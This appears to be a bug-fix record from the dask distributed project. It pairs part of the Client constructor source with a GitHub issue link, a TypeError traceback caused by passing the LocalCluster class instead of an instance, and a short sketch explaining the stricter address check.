connection_limit=512,
**kwargs,
):
if timeout == no_default:
timeout = dask.config.get("distributed.comm.timeouts.connect")
if timeout is not None:
timeout = parse_timedelta(timeout, "s")
self._timeout = timeout
self.futures = dict()
self.refcount = defaultdict(lambda: 0)
self.coroutines = []
if name is None:
name = dask.config.get("client-name", None)
self.id = (
type(self).__name__
+ ("-" + name + "-" if name else "-")
+ str(uuid.uuid1(clock_seq=os.getpid()))
)
self.generation = 0
self.status = "newly-created"
self._pending_msg_buffer = []
self.extensions = {}
self.scheduler_file = scheduler_file
self._startup_kwargs = kwargs
self.cluster = None
self.scheduler = None
self._scheduler_identity = {}
# A reentrant-lock on the refcounts for futures associated with this
# client. Should be held by individual operations modifying refcounts,
# or any bulk operation that needs to ensure the set of futures doesn't
# change during operation.
self._refcount_lock = threading.RLock()
self.datasets = Datasets(self)
self._serializers = serializers
if deserializers is None:
deserializers = serializers
self._deserializers = deserializers
self.direct_to_workers = direct_to_workers
# Communication
self.scheduler_comm = None
if address is None:
address = dask.config.get("scheduler-address", None)
if address:
logger.info("Config value `scheduler-address` found: %s", address)
if address is not None and kwargs:
raise ValueError("Unexpected keyword arguments: {}".format(str(sorted(kwargs))))
if isinstance(address, (rpc, PooledRPCCall)):
self.scheduler = address
elif hasattr(address, "scheduler_address"):
# It's a LocalCluster or LocalCluster-compatible object
self.cluster = address
with suppress(AttributeError):
loop = address.loop
if security is None:
security = getattr(self.cluster, "security", None)
if security is None:
security = Security()
elif security is True:
security = Security.temporary()
self._startup_kwargs["security"] = security
elif not isinstance(security, Security):
raise TypeError("security must be a Security object")
self.security = security
if name == "worker":
self.connection_args = self.security.get_connection_args("worker")
else:
self.connection_args = self.security.get_connection_args("client")
self._connecting_to_scheduler = False
self._asynchronous = asynchronous
self._should_close_loop = not loop
self._loop_runner = LoopRunner(loop=loop, asynchronous=asynchronous)
self.io_loop = self.loop = self._loop_runner.loop
self._gather_keys = None
self._gather_future = None
if heartbeat_interval is None:
heartbeat_interval = dask.config.get("distributed.client.heartbeat")
heartbeat_interval = parse_timedelta(heartbeat_interval, default="ms")
scheduler_info_interval = parse_timedelta(
dask.config.get("distributed.client.scheduler-info-interval", default="ms")
)
self._periodic_callbacks = dict()
self._periodic_callbacks["scheduler-info"] = PeriodicCallback(
self._update_scheduler_info,
scheduler_info_interval * 1000,
)
self._periodic_callbacks["heartbeat"] = PeriodicCallback(
self._heartbeat, heartbeat_interval * 1000
)
self._start_arg = address
if set_as_default:
self._set_config = dask.config.set(
scheduler="dask.distributed", shuffle="tasks"
)
self._stream_handlers = {
"key-in-memory": self._handle_key_in_memory,
"lost-data": self._handle_lost_data,
"cancelled-key": self._handle_cancelled_key,
"task-retried": self._handle_retried_key,
"task-erred": self._handle_task_erred,
"restart": self._handle_restart,
"error": self._handle_error,
}
self._state_handlers = {
"memory": self._handle_key_in_memory,
"lost": self._handle_lost_data,
"erred": self._handle_task_erred,
}
self.rpc = ConnectionPool(
limit=connection_limit,
serializers=serializers,
deserializers=deserializers,
deserialize=True,
connection_args=self.connection_args,
timeout=timeout,
server=self,
)
for ext in extensions:
ext(self)
self.start(timeout=timeout)
Client._instances.add(self)
from distributed.recreate_exceptions import ReplayExceptionClient
ReplayExceptionClient(self)
|
https://github.com/dask/distributed/issues/3839
|
---------------------------------------------------------------------------
TypeError Traceback (most recent call last)
<ipython-input-3-82a29784114b> in <module>
1 cluster = LocalCluster
----> 2 client = Client(cluster)
~/Projects/dask/distributed/distributed/client.py in __init__(self, address, loop, timeout, set_as_default, scheduler_file, security, asynchronous, name, heartbeat_interval, serializers, deserializers, extensions, direct_to_workers, connection_limit, **kwargs)
734 ext(self)
735
--> 736 self.start(timeout=timeout)
737 Client._instances.add(self)
738
~/Projects/dask/distributed/distributed/client.py in start(self, **kwargs)
938 self._started = asyncio.ensure_future(self._start(**kwargs))
939 else:
--> 940 sync(self.loop, self._start, **kwargs)
941
942 def __await__(self):
~/Projects/dask/distributed/distributed/utils.py in sync(loop, func, callback_timeout, *args, **kwargs)
337 if error[0]:
338 typ, exc, tb = error[0]
--> 339 raise exc.with_traceback(tb)
340 else:
341 return result[0]
~/Projects/dask/distributed/distributed/utils.py in f()
321 if callback_timeout is not None:
322 future = asyncio.wait_for(future, callback_timeout)
--> 323 result[0] = yield future
324 except Exception as exc:
325 error[0] = sys.exc_info()
~/miniconda3/envs/dask/lib/python3.7/site-packages/tornado/gen.py in run(self)
733
734 try:
--> 735 value = future.result()
736 except Exception:
737 exc_info = sys.exc_info()
~/Projects/dask/distributed/distributed/client.py in _start(self, timeout, **kwargs)
1031
1032 if self.scheduler is None:
-> 1033 self.scheduler = self.rpc(address)
1034 self.scheduler_comm = None
1035
~/Projects/dask/distributed/distributed/core.py in __call__(self, addr, ip, port)
915 def __call__(self, addr=None, ip=None, port=None):
916 """ Cached rpc objects """
--> 917 addr = addr_from_args(addr=addr, ip=ip, port=port)
918 return PooledRPCCall(
919 addr, self, serializers=self.serializers, deserializers=self.deserializers
~/Projects/dask/distributed/distributed/core.py in addr_from_args(addr, ip, port)
616 if isinstance(addr, tuple):
617 addr = unparse_host_port(*addr)
--> 618 return normalize_address(addr)
619
620
~/Projects/dask/distributed/distributed/comm/addressing.py in normalize_address(addr)
52 'tcp://[::1]'
53 """
---> 54 return unparse_address(*parse_address(addr))
55
56
~/Projects/dask/distributed/distributed/comm/addressing.py in parse_address(addr, strict)
19 """
20 if not isinstance(addr, str):
---> 21 raise TypeError("expected str, got %r" % addr.__class__.__name__)
22 scheme, sep, loc = addr.rpartition("://")
23 if strict and not sep:
TypeError: expected str, got 'property'
|
TypeError
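A minimal sketch of the bug this guards against: passing the LocalCluster class instead of an instance. hasattr(cls, "scheduler_address") is True because the property object itself is a class attribute, so the old check accepted it and the address later surfaced as "expected str, got 'property'"; the isinstance(getattr(...), str) check only accepts a real address string (LocalCluster here is a hypothetical stand-in):

class LocalCluster:
    @property
    def scheduler_address(self):
        return "tcp://127.0.0.1:8786"

cls = LocalCluster  # user forgot the parentheses, as in the traceback

print(hasattr(cls, "scheduler_address"))        # True  -> old check passes
print(type(getattr(cls, "scheduler_address")))  # <class 'property'>

# after_merge check: require an actual address string
print(isinstance(getattr(cls, "scheduler_address", None), str))            # False
print(isinstance(getattr(LocalCluster(), "scheduler_address", None), str)) # True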
|